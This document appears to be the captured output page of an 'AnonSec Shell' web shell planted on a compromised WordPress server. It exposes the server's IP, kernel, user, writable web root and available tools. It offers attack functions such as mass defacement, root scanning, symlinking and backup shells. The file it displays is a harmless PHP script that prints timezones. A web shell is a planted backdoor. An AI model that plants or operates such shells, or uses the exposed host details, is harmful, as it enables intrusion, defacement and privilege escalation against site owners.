AnonSec Shell
Server IP : 198.244.165.102  /  Your IP : 216.73.216.218   [ Reverse IP ]
Web Server : nginx/1.24.0
System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : colleary ( 1011)
PHP Version : 8.3.23
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/midwest/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/midwest/public_html/test-full-time.php
<?php
// Get server time before loading WordPress
$server_timezone_before = date_default_timezone_get();
$server_time_before = date('Y-m-d H:i:s');

// Output pre-WP server time
echo "<strong>Server Timezone (Before wp-load):</strong> $server_timezone_before <br>";
echo "<strong>Server Time (Before wp-load):</strong> $server_time_before <br><br>";

// Load WordPress
require_once __DIR__ . '/wp-load.php';

// Get server time after wp-load (WordPress may change the default timezone)
$server_timezone_after = date_default_timezone_get();
$server_time_after = date('Y-m-d H:i:s');

// Get WordPress timezone and time
$wp_timezone = get_option('timezone_string');
if (empty($wp_timezone)) {
    $gmt_offset = get_option('gmt_offset');
    $wp_timezone = timezone_name_from_abbr('', $gmt_offset * 3600, 0);
}
$wp_time = wp_date('Y-m-d H:i:s', current_time('timestamp'));

echo "<strong>Server Timezone (After wp-load):</strong> $server_timezone_after <br>";
echo "<strong>Server Time (After wp-load):</strong> $server_time_after <br><br>";

echo "<strong>WordPress Timezone:</strong> $wp_timezone <br>";
echo "<strong>WordPress Time:</strong> $wp_time <br>";
?>

Anon7 - 2022
AnonSec Team